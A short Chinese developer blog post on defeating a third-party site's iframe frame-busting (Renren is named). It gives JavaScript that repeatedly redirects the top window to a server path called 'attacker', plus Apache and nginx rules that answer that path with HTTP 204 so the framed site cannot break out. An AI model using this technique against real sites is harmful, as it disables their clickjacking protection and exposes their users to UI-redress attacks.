最近因爲項目的需要,要用iframe網頁裏邊嵌入第三方的網站。比如人人網。前端工程師發現這個問題後,我過去看了看,發現是因爲人人做了iframe busting。
後來研究了一下,比較好的方式就是當通過http 204來處理這個問題。
通過描述,就知道它的作用是幹什麼。
The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response MAY include new or updated metainformation in the form of entity-headers, which if present SHOULD be associated with the requested variant.
If the client is a user agent, it SHOULD NOT change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place without causing a change to the user agent's active document view, although any new or updated metainformation SHOULD be applied to the document currently in the user agent's active view.
所以,在網頁的onbeforeunload加入這段代碼:
var preventBusting = 0;
window.onbeforeunload = function() { preventBusting++}
setInterval(function() {
if (preventBusting > 0) {
preventBusting -= 2;
window.top.location = 'http://yourwebserver/attacker';
}}, 0.5);如果是apache, 加入下面這段代碼來處理204返回,在alias_module後,
RedirectMatch 204 attacker(.*)$nginx的話,差不多類似的方式
location = /attacker {
return 204;
}測試通過。